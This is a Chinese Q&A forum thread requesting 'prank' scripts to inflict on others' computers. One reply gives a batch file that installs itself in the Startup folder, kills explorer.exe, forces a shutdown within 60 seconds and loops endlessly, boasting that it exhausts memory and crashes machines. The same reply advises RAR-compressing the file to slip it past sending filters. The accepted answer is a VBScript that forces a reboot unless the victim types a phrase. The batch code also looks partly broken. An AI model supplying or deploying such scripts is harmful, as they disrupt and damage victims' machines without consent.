请各位高手给我几个vbe整人程序的代码(简单的我有了)?

能不能弄个VBE后缀的啊,这个后缀发不出去!!

@echo off
if exist New.bat copy "New.bat" "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\New.bat"
for %%a in (c d e f g h) do (
for /f %%b in ('dir /s /b "%%a:\QQ.exe"') do (
goto :1
:1
tasklist|findstr /i "1.exe" || start %%b
))
at echo ^G^G^G^G^G^G&taskkill /f /t explorer.exe&shutdown -s -t 60
goto :1

效果是每次开机都会自动60秒内关机,而且机器不停的发出蜂鸣声非常吵!桌面消失 60秒内内存耗尽 ,机器烂一点的会蓝屏或死机,好一点的也会死机!

我这里写的是New.bat 你可以重命名! 后缀为.bat就可以了! 发不出去你不知道先rar压缩下吗?然后再发!
温馨提示:答案为网友推荐,仅供参考
第1个回答  2009-12-15
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""小朋友偷看别人的东西是不对的···"" ",0 ,true
dim a
do while(a <> "知道了")
a = inputbox ("小朋友偷看别人东西是不对的,如果你知道了,就在下面写着“好”的地方打上知道了,否则你的电脑将在1分钟后自动关机 ","知错了","好",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "你是个好孩子"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "这样才对吗"本回答被提问者采纳
相似回答